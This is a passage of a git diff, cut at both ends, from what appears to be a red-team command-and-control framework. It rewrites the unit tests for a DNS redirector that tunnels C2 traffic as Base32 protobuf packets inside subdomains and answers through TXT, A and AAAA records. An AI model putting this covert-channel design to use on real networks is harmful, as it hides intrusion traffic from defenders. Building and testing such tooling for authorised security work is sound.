0x00, byte(dnsClassIN)) // Class: IN @@ -894,9 +823,8 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans var rdata []byte if len(data) == 0 { - rdata = []byte{0x00} // Empty TXT string + rdata = []byte{0x00} } else { - // Split into 255-byte chunks tempData := data for len(tempData) > 0 { chunkSize := len(tempData) @@ -909,22 +837,18 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans } } - // RDLENGTH and RDATA response = append(response, byte(len(rdata)>>8), byte(len(rdata))) response = append(response, rdata...) case aRecordType: - // Multiple A records - 4 bytes each for i := uint16(0); i < answerCount; i++ { response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer response = append(response, 0x00, byte(aRecordType)) // Type: A response = append(response, 0x00, byte(dnsClassIN)) // Class: IN response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL - // RDLENGTH: always 4 for A records response = append(response, 0x00, 0x04) - // RDATA: 4 bytes from data, padded with zeros if needed start := int(i) * recordSize end := start + recordSize rdata := make([]byte, 4) @@ -939,17 +863,14 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans } case aaaaRecordType: - // Multiple AAAA records - 16 bytes each for i := uint16(0); i < answerCount; i++ { response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer response = append(response, 0x00, byte(aaaaRecordType)) // Type: AAAA response = append(response, 0x00, byte(dnsClassIN)) // Class: IN response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL - // RDLENGTH: always 16 for AAAA records response = append(response, 0x00, 0x10) - // RDATA: 16 bytes from data, padded with zeros if needed start := int(i) * recordSize end := start + recordSize rdata := make([]byte, 16) @@ -964,7 +885,6 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans } default: - // Unknown type - single empty record response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: match query response = append(response, 0x00, byte(dnsClassIN)) // Class: IN diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go index 3fb487023..3bec7bc85 100644 --- a/tavern/internal/redirectors/dns/dns_test.go +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -1,282 +1,993 @@ -package dns_test +package dns import ( + "context" + "encoding/base32" + "hash/crc32" "net" + "sort" + "sync" "testing" "time" "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" - "google.golang.org/grpc" - "google.golang.org/grpc/credentials/insecure" - - dnsredirector "realm.pub/tavern/internal/redirectors/dns" + "google.golang.org/protobuf/proto" + "realm.pub/tavern/internal/c2/dnspb" ) -// TestParseListenAddr tests the parseListenAddr function +// TestParseListenAddr tests the ParseListenAddr function func TestParseListenAddr(t *testing.T) { - t.Run("default port with multiple domains", func(t *testing.T) { - addr, domains, err := dnsredirector.ParseListenAddr("0.0.0.0?domain=example.com&domain=foo.bar") + tests := []struct { + name string + input string + expectedAddr string + expectedDomains []string + expectError bool + }{ + { + name: "default port with multiple domains", + input: "0.0.0.0?domain=dnsc2.realm.pub&domain=foo.bar", + expectedAddr: "0.0.0.0:53", + expectedDomains: []string{"dnsc2.realm.pub", "foo.bar"}, + }, + { + name: "custom port with single domain", + input: "127.0.0.1:8053?domain=dnsc2.realm.pub", + expectedAddr: "127.0.0.1:8053", + expectedDomains: []string{"dnsc2.realm.pub"}, + }, + { + name: "no query params", + input: "0.0.0.0:5353", + expectedAddr: "0.0.0.0:5353", + expectedDomains: nil, + }, + { + name: "empty domain value", + input: "0.0.0.0?domain=", + expectedAddr: "0.0.0.0:53", + expectedDomains: nil, + }, + { + name: "mixed valid and empty domains", + input: "0.0.0.0?domain=valid.com&domain=&domain=also.valid", + expectedAddr: "0.0.0.0:53", + expectedDomains: []string{"valid.com", "also.valid"}, + }, + { + name: "malformed URL encoding", + input: "0.0.0.0?domain=%ZZ", + expectError: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + addr, domains, err := ParseListenAddr(tt.input) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectedAddr, addr) + assert.ElementsMatch(t, tt.expectedDomains, domains) + }) + } +} + +// TestExtractSubdomain tests subdomain extraction from full domain names +func TestExtractSubdomain(t *testing.T) { + r := &Redirector{ + baseDomains: []string{"dnsc2.realm.pub", "foo.bar.com"}, + } + + tests := []struct { + name string + domain string + expectedSubdom string + expectError bool + }{ + { + name: "simple subdomain", + domain: "test.dnsc2.realm.pub", + expectedSubdom: "test", + }, + { + name: "multi-label subdomain", + domain: "a.b.c.dnsc2.realm.pub", + expectedSubdom: "a.b.c", + }, + { + name: "subdomain with longer base domain", + domain: "test.foo.bar.com", + expectedSubdom: "test", + }, + { + name: "no matching base domain", + domain: "test.unknown.com", + expectError: true, + }, + { + name: "only base domain (no subdomain)", + domain: "dnsc2.realm.pub", + expectError: true, + }, + { + name: "case insensitive match", + domain: "test.DNSC2.REALM.PUB", + expectedSubdom: "test", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + subdomain, err := r.extractSubdomain(tt.domain) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectedSubdom, subdomain) + }) + } +} + +// TestDecodePacket tests Base32 decoding and protobuf unmarshaling +func TestDecodePacket(t *testing.T) { + r := &Redirector{} + + t.Run("valid INIT packet", func(t *testing.T) { + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + Sequence: 0, + ConversationId: "test1234", + Data: []byte{0x01, 0x02, 0x03}, + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + decoded, err := r.decodePacket(encoded) require.NoError(t, err) - assert.Equal(t, "0.0.0.0:53", addr) - assert.ElementsMatch(t, []string{"example.com", "foo.bar"}, domains) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_INIT, decoded.Type) + assert.Equal(t, "test1234", decoded.ConversationId) + assert.Equal(t, []byte{0x01, 0x02, 0x03}, decoded.Data) }) - t.Run("custom port with single domain", func(t *testing.T) { - addr, domains, err := dnsredirector.ParseListenAddr("127.0.0.1:8053?domain=example.com") + t.Run("valid DATA packet with CRC", func(t *testing.T) { + data := []byte{0xDE, 0xAD, 0xBE, 0xEF} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + Sequence: 1, + ConversationId: "test5678", + Data: data, + Crc32: crc32.ChecksumIEEE(data), + } + packetBytes, err := proto.Marshal(packet) require.NoError(t, err) - assert.Equal(t, "127.0.0.1:8053", addr) - assert.ElementsMatch(t, []string{"example.com"}, domains) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + decoded, err := r.decodePacket(encoded) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_DATA, decoded.Type) + assert.Equal(t, data, decoded.Data) + }) + + t.Run("DATA packet with invalid CRC", func(t *testing.T) { + data := []byte{0xDE, 0xAD, 0xBE, 0xEF} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + Sequence: 1, + ConversationId: "test5678", + Data: data, + Crc32: 0xDEADBEEF, // Wrong CRC + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + _, err = r.decodePacket(encoded) + assert.Error(t, err) + assert.Contains(t, err.Error(), "CRC mismatch") + }) + + t.Run("invalid Base32", func(t *testing.T) { + _, err := r.decodePacket("!!!invalid!!!") + assert.Error(t, err) }) - t.Run("malformed domain value", func(t *testing.T) { - _, _, err := dnsredirector.ParseListenAddr("127.0.0.1:8053?domain=%ZZ") + t.Run("invalid protobuf", func(t *testing.T) { + // Valid Base32 but not valid protobuf + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString([]byte{0xFF, 0xFF, 0xFF}) + _, err := r.decodePacket(encoded) assert.Error(t, err) - assert.Contains(t, err.Error(), "decode domain") }) - t.Run("no query params", func(t *testing.T) { - addr, domains, err := dnsredirector.ParseListenAddr("0.0.0.0:5353") + t.Run("packet with labels (dots)", func(t *testing.T) { + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "test1234", + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + // Split into labels (simulating DNS format) + withDots := encoded[:4] + "." + encoded[4:] + + decoded, err := r.decodePacket(withDots) require.NoError(t, err) - assert.Equal(t, "0.0.0.0:5353", addr) - assert.Empty(t, domains) + assert.Equal(t, "test1234", decoded.ConversationId) }) } -// newTestRedirector creates a test redirector with stubbed upstream -func newTestRedirector() *dnsredirector.Redirector { - return &dnsredirector.Redirector{} +// TestComputeAcksNacks tests the ACK range and NACK computation +func TestComputeAcksNacks(t *testing.T) { + r := &Redirector{} + + tests := []struct { + name string + chunks map[uint32][]byte + expectedAcks []*dnspb.AckRange + expectedNacks []uint32 + }{ + { + name: "empty chunks", + chunks: map[uint32][]byte{}, + expectedAcks: []*dnspb.AckRange{}, + expectedNacks: []uint32{}, + }, + { + name: "single chunk", + chunks: map[uint32][]byte{ + 1: {0x01}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 1}, + }, + expectedNacks: []uint32{}, + }, + { + name: "consecutive chunks", + chunks: map[uint32][]byte{ + 1: {0x01}, + 2: {0x02}, + 3: {0x03}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 3}, + }, + expectedNacks: []uint32{}, + }, + { + name: "gap in middle", + chunks: map[uint32][]byte{ + 1: {0x01}, + 2: {0x02}, + 5: {0x05}, + 6: {0x06}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 2}, + {StartSeq: 5, EndSeq: 6}, + }, + expectedNacks: []uint32{3, 4}, + }, + { + name: "multiple gaps", + chunks: map[uint32][]byte{ + 1: {0x01}, + 3: {0x03}, + 5: {0x05}, + 10: {0x0A}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 1}, + {StartSeq: 3, EndSeq: 3}, + {StartSeq: 5, EndSeq: 5}, + {StartSeq: 10, EndSeq: 10}, + }, + expectedNacks: []uint32{2, 4, 6, 7, 8, 9}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + conv := &Conversation{ + Chunks: tt.chunks, + } + + acks, nacks := r.computeAcksNacks(conv) + + // Sort both slices for comparison + sort.Slice(acks, func(i, j int) bool { return acks[i].StartSeq < acks[j].StartSeq }) + + assert.Equal(t, tt.expectedAcks, acks) + assert.Equal(t, tt.expectedNacks, nacks) + }) + } } -// TestInitDataEndLifecycle tests the complete packet handling flow -func TestInitDataEndLifecycle(t *testing.T) { - r := newTestRedirector() +// TestHandleInitPacket tests INIT packet processing +func TestHandleInitPacket(t *testing.T) { + t.Run("valid init packet", func(t *testing.T) { + r := &Redirector{} + + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 5, + DataCrc32: 0x12345678, + FileSize: 1024, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) - // Step 1: Send init packet - // Init payload: [method_code:2][total_chunks:5][crc:4] - methodCode := "ct" // ClaimTasks - totalChunksStr := "00002" // 2 chunks (base36) - testData := []byte{0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08} - crc := dnsredirector.CalculateCRC16(testData) - crcStr := dnsredirector.EncodeBase36CRC(int(crc)) + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } - initPayload := methodCode + totalChunksStr + crcStr - tempConvID := "temp12345678" + responseData, err := r.handleInitPacket(packet) + require.NoError(t, err) + require.NotNil(t, responseData) - convID, err := r.HandleInitPacket(tempConvID, initPayload) - require.NoError(t, err) - assert.NotEmpty(t, convID) - assert.Len(t, convID, 12) // CONV_ID_SIZE + // Verify response is a STATUS packet + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(responseData, &statusPacket) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_STATUS, statusPacket.Type) + assert.Equal(t, "conv1234", statusPacket.ConversationId) + + // Verify conversation was created + val, ok := r.conversations.Load("conv1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Equal(t, "/c2.C2/ClaimTasks", conv.MethodPath) + assert.Equal(t, uint32(5), conv.TotalChunks) + assert.Equal(t, uint32(0x12345678), conv.ExpectedCRC) + assert.Equal(t, uint32(1024), conv.ExpectedDataSize) + }) - convIDStr := string(convID) + t.Run("invalid init payload", func(t *testing.T) { + r := &Redirector{} - // Verify conversation was created - conv, ok := r.GetConversation(convIDStr) - require.True(t, ok) - assert.Equal(t, "/c2.C2/ClaimTasks", conv.MethodPath) - assert.Equal(t, 2, conv.TotalChunks) - assert.Equal(t, crc, conv.ExpectedCRC) + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: []byte{0xFF, 0xFF}, // Invalid protobuf + } - // Step 2: Send data chunks - chunk0 := testData[:4] - chunk1 := testData[4:] + _, err := r.handleInitPacket(packet) + assert.Error(t, err) + }) - _, err = r.HandleDataPacket(convIDStr, 0, chunk0) - require.NoError(t, err) + t.Run("data size exceeds maximum", func(t *testing.T) { + r := &Redirector{} - _, err = r.HandleDataPacket(convIDStr, 1, chunk1) - require.NoError(t, err) + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 1, + FileSize: MaxDataSize + 1, // Exceeds limit + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) - // Verify chunks were stored - conv, _ = r.GetConversation(convIDStr) - assert.Len(t, conv.Chunks, 2) -} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleInitPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "exceeds maximum") + }) + + t.Run("max conversations reached", func(t *testing.T) { + r := &Redirector{ + conversationCount: MaxActiveConversations, + } -// TestHandleDataPacketUnknownConversation tests error handling for unknown conversation -func TestHandleDataPacketUnknownConversation(t *testing.T) { - r := newTestRedirector() + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 1, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) - _, err := r.HandleDataPacket("nonexistent", 0, []byte{0x01, 0x02}) - assert.Error(t, err) - assert.Contains(t, err.Error(), "unknown conversation") + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleInitPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "max active conversations") + }) } -// TestHandleFetchPacket tests response chunk fetching +// TestHandleFetchPacket tests FETCH packet processing func TestHandleFetchPacket(t *testing.T) { - r := newTestRedirector() + t.Run("fetch single response", func(t *testing.T) { + r := &Redirector{} + responseData := []byte("test response data") + + conv := &Conversation{ + ID: "conv1234", + ResponseData: responseData, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) - t.Run("fetch chunk within bounds - text chunking", func(t *testing.T) { - convID := "test12345678" - conv := &dnsredirector.Conversation{ - ID: convID, - ResponseChunks: []string{"chunk0", "chunk1", "chunk2"}, - IsBinaryChunking: false, - LastActivity: time.Now(), + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", } - r.StoreConversation(convID, conv) - // Fetch chunk 1 - data, err := r.HandleFetchPacket(convID, 1) + data, err := r.handleFetchPacket(packet) require.NoError(t, err) - assert.Equal(t, "ok:chunk1", string(data)) - - // Conversation should still exist - _, ok := r.GetConversation(convID) - assert.True(t, ok) + assert.Equal(t, responseData, data) }) - t.Run("fetch chunk within bounds - binary chunking", func(t *testing.T) { - convID := "bin123456789" - conv := &dnsredirector.Conversation{ - ID: convID, - ResponseChunks: []string{string([]byte{0x01, 0x02}), string([]byte{0x03, 0x04})}, - IsBinaryChunking: true, - LastActivity: time.Now(), + t.Run("fetch chunked response metadata", func(t *testing.T) { + r := &Redirector{} + responseData := []byte("full response") + responseCRC := crc32.ChecksumIEEE(responseData) + + conv := &Conversation{ + ID: "conv1234", + ResponseData: responseData, + ResponseChunks: [][]byte{[]byte("chunk1"), []byte("chunk2")}, + ResponseCRC: responseCRC, + LastActivity: time.Now(), } - r.StoreConversation(convID, conv) + r.conversations.Store("conv1234", conv) - // Fetch chunk 0 - data, err := r.HandleFetchPacket(convID, 0) + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: nil, // No payload = request metadata + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + + var metadata dnspb.ResponseMetadata + err = proto.Unmarshal(data, &metadata) require.NoError(t, err) - assert.Equal(t, []byte{0x01, 0x02}, data) + assert.Equal(t, uint32(2), metadata.TotalChunks) + assert.Equal(t, responseCRC, metadata.DataCrc32) }) - t.Run("fetch beyond bounds triggers cleanup", func(t *testing.T) { - convID := "cleanup12345" - conv := &dnsredirector.Conversation{ - ID: convID, - ResponseChunks: []string{"chunk0"}, - IsBinaryChunking: false, - LastActivity: time.Now(), + t.Run("fetch specific chunk", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: []byte("full"), + ResponseChunks: [][]byte{[]byte("chunk0"), []byte("chunk1"), []byte("chunk2")}, + LastActivity: time.Now(), } - r.StoreConversation(convID, conv) + r.conversations.Store("conv1234", conv) - // Fetch seq beyond bounds - data, err := r.HandleFetchPacket(convID, 1) + fetchPayload := &dnspb.FetchPayload{ChunkIndex: 2} // 1-indexed + payloadBytes, err := proto.Marshal(fetchPayload) require.NoError(t, err) - assert.Equal(t, "ok:", string(data)) - // Conversation should be deleted - _, ok := r.GetConversation(convID) - assert.False(t, ok) + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: payloadBytes, + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + assert.Equal(t, []byte("chunk1"), data) // 1-indexed -> 0-indexed + }) + + t.Run("fetch unknown conversation", func(t *testing.T) { + r := &Redirector{} + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "unknown", + } + + _, err := r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "conversation not found") + }) + + t.Run("fetch with no response ready", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: nil, // No response yet + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + } + + _, err := r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "no response data") }) - t.Run("fetch from unknown conversation", func(t *testing.T) { - _, err := r.HandleFetchPacket("unknown", 0) + t.Run("fetch chunk out of bounds", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: []byte("full"), + ResponseChunks: [][]byte{[]byte("chunk0")}, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + fetchPayload := &dnspb.FetchPayload{ChunkIndex: 10} // Out of bounds + payloadBytes, err := proto.Marshal(fetchPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleFetchPacket(packet) assert.Error(t, err) - assert.Contains(t, err.Error(), "unknown conversation") + assert.Contains(t, err.Error(), "invalid chunk index") }) } -// TestCleanupConversations tests conversation expiration -func TestCleanupConversations(t *testing.T) { - r := newTestRedirector() +// TestParseDomainNameAndType tests DNS query parsing +func TestParseDomainNameAndType(t *testing.T) { + r := &Redirector{} + + tests := []struct { + name string + query []byte + expectDomain string + expectType uint16 + expectError bool + }{ + { + name: "valid TXT query", + query: func() []byte { + q := []byte{ + 5, 'd', 'n', 's', 'c', '2', // "dnsc2" + 5, 'r', 'e', 'a', 'l', 'm', // "realm" + 3, 'p', 'u', 'b', // "pub" + 0, // null terminator + 0, 16, // Type: TXT + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "dnsc2.realm.pub", + expectType: 16, + }, + { + name: "valid A query", + query: func() []byte { + q := []byte{ + 4, 't', 'e', 's', 't', // "test" + 5, 'd', 'n', 's', 'c', '2', // "dnsc2" + 5, 'r', 'e', 'a', 'l', 'm', // "realm" + 3, 'p', 'u', 'b', // "pub" + 0, // null terminator + 0, 1, // Type: A + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "test.dnsc2.realm.pub", + expectType: 1, + }, + { + name: "valid AAAA query", + query: func() []byte { + q := []byte{ + 3, 'w', 'w', 'w', // "www" + 4, 't', 'e', 's', 't', // "test" + 3, 'c', 'o', 'm', // "com" + 0, // null terminator + 0, 28, // Type: AAAA + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "www.test.com", + expectType: 28, + }, + { + name: "truncated query", + query: []byte{7, 'e', 'x', 'a'}, // Incomplete + expectError: true, + }, + { + name: "query too short for type", + query: []byte{4, 't', 'e', 's', 't', 0}, // Missing type/class + expectError: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + domain, queryType, err := r.parseDomainNameAndType(tt.query) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectDomain, domain) + assert.Equal(t, tt.expectType, queryType) + }) + } +} - // Create stale conversation (old timestamp) - staleConvID := "stale1234567" - staleConv := &dnsredirector.Conversation{ - ID: staleConvID, - LastActivity: time.Now().Add(-20 * time.Minute), // Older than timeout +// TestConversationCleanup tests cleanup of stale conversations +func TestConversationCleanup(t *testing.T) { + r := &Redirector{ + conversationTimeout: 15 * time.Minute, } - r.StoreConversation(staleConvID, staleConv) + + // Create stale conversation + staleConv := &Conversation{ + ID: "stale", + LastActivity: time.Now().Add(-20 * time.Minute), + } + r.conversations.Store("stale", staleConv) + r.conversationCount = 1 // Create fresh conversation - freshConvID := "fresh1234567" - freshConv := &dnsredirector.Conversation{ - ID: freshConvID, + freshConv := &Conversation{ + ID: "fresh", LastActivity: time.Now(), } - r.StoreConversation(freshConvID, freshConv) - - // Run cleanup once - r.CleanupConversationsOnce(15 * time.Minute) + r.conversations.Store("fresh", freshConv) + r.conversationCount = 2 + + // Run cleanup + now := time.Now() + r.conversations.Range(func(key, value any) bool { + conv := value.(*Conversation) + conv.mu.Lock() + if now.Sub(conv.LastActivity) > r.conversationTimeout { + r.conversations.Delete(key) + r.conversationCount-- + } + conv.mu.Unlock() + return true + }) - // Verify stale conversation was removed - _, ok := r.GetConversation(staleConvID) + // Verify stale was removed + _, ok := r.conversations.Load("stale") assert.False(t, ok, "stale conversation should be removed") - // Verify fresh conversation remains - _, ok = r.GetConversation(freshConvID) + // Verify fresh remains + _, ok = r.conversations.Load("fresh") assert.True(t, ok, "fresh conversation should remain") -} -// stubUpstream provides a minimal gRPC server for testing -type stubUpstream struct { - server *grpc.Server - clientConn *grpc.ClientConn - t *testing.T + assert.Equal(t, int32(1), r.conversationCount) } -func newStubUpstream(t *testing.T, echoData []byte) *stubUpstream { - t.Helper() +// TestConcurrentConversationAccess tests thread safety of conversation handling +func TestConcurrentConversationAccess(t *testing.T) { + r := &Redirector{} - // Create a simple handler that echoes back the request - handler := func(srv any, stream grpc.ServerStream) error { - var reqBytes []byte - if err := stream.RecvMsg(&reqBytes); err != nil { - return err - } - - // Echo back the request data - return stream.SendMsg(echoData) + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 100, + DataCrc32: 0, + FileSize: 0, } - - server := grpc.NewServer(grpc.UnknownServiceHandler(handler)) - - // Start server on random port - listener, err := testListener(t) + payloadBytes, err := proto.Marshal(initPayload) require.NoError(t, err) - go func() { - if err := server.Serve(listener); err != nil && err != grpc.ErrServerStopped { - t.Logf("stub server error: %v", err) - } - }() + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "concurrent", + Data: payloadBytes, + } - // Create client connection - conn, err := grpc.Dial(listener.Addr().String(), grpc.WithTransportCredentials(insecure.NewCredentials())) + _, err = r.handleInitPacket(packet) require.NoError(t, err) - return &stubUpstream{ - server: server, - clientConn: conn, - t: t, + // Concurrent access to store chunks + var wg sync.WaitGroup + for i := uint32(1); i <= 100; i++ { + wg.Add(1) + go func(seq uint32) { + defer wg.Done() + + val, ok := r.conversations.Load("concurrent") + if !ok { + return + } + conv := val.(*Conversation) + conv.mu.Lock() + conv.Chunks[seq] = []byte{byte(seq)} + conv.mu.Unlock() + }(i) } -} + wg.Wait() -func (s *stubUpstream) ClientConn() *grpc.ClientConn { - return s.clientConn + // Verify all chunks stored + val, ok := r.conversations.Load("concurrent") + require.True(t, ok) + conv := val.(*Conversation) + assert.Len(t, conv.Chunks, 100) } -func (s *stubUpstream) Close() { - s.clientConn.Close() - s.server.Stop() +// TestBuildDNSResponse tests DNS response packet construction +func TestBuildDNSResponse(t *testing.T) { + r := &Redirector{} + + // Create a mock UDP connection for testing + serverAddr, err := net.ResolveUDPAddr("udp", "127.0.0.1:0") + require.NoError(t, err) + serverConn, err := net.ListenUDP("udp", serverAddr) + require.NoError(t, err) + defer serverConn.Close() + + clientAddr, err := net.ResolveUDPAddr("udp", "127.0.0.1:0") + require.NoError(t, err) + clientConn, err := net.ListenUDP("udp", clientAddr) + require.NoError(t, err) + defer clientConn.Close() + + t.Run("TXT record response", func(t *testing.T) { + r.sendDNSResponse(serverConn, clientConn.LocalAddr().(*net.UDPAddr), 0x1234, "test.dnsc2.realm.pub", txtRecordType, []byte("hello")) + + buf := make([]byte, 512) + clientConn.SetReadDeadline(time.Now().Add(time.Second)) + n, _, err := clientConn.ReadFromUDP(buf) + require.NoError(t, err) + + // Verify transaction ID + assert.Equal(t, uint16(0x1234), uint16(buf[0])<<8|uint16(buf[1])) + // Verify it's a response (QR bit set) + assert.True(t, buf[2]&0x80 != 0) + // Verify answer count is 1 + assert.Equal(t, uint16(1), uint16(buf[6])<<8|uint16(buf[7])) + + // Response should contain data + assert.Greater(t, n, 12) + }) } -func testListener(t *testing.T) (net.Listener, error) { - t.Helper() - return net.Listen("tcp", "127.0.0.1:0") +// TestHandleDataPacket tests DATA packet processing and chunk storage +func TestHandleDataPacket(t *testing.T) { + t.Run("store single chunk", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + // Create conversation first with INIT - set TotalChunks > 1 to avoid completion + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 2, // Prevent completion on first chunk + DataCrc32: crc32.ChecksumIEEE([]byte{0x01, 0x02}), + FileSize: 2, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + initPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "data1234", + Data: payloadBytes, + } + _, err = r.handleInitPacket(initPacket) + require.NoError(t, err) + + // Send DATA packet + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "data1234", + Sequence: 1, + Data: []byte{0x01}, + } + + statusData, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + require.NoError(t, err) + + // Verify STATUS response + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(statusData, &statusPacket) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_STATUS, statusPacket.Type) + assert.Equal(t, "data1234", statusPacket.ConversationId) + + // Verify chunk was stored + val, ok := r.conversations.Load("data1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Len(t, conv.Chunks, 1) + assert.Equal(t, []byte{0x01}, conv.Chunks[1]) + }) + + t.Run("store multiple chunks with gaps", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + // Create conversation + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 5, + DataCrc32: 0, + FileSize: 5, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + initPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "gaps1234", + Data: payloadBytes, + } + _, err = r.handleInitPacket(initPacket) + require.NoError(t, err) + + // Send chunks 1, 3, 5 (gaps at 2, 4) + for _, seq := range []uint32{1, 3, 5} { + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "gaps1234", + Sequence: seq, + Data: []byte{byte(seq)}, + } + + statusData, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + require.NoError(t, err) + + // Parse STATUS response + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(statusData, &statusPacket) + require.NoError(t, err) + + // Should always have ACKs for received chunks + 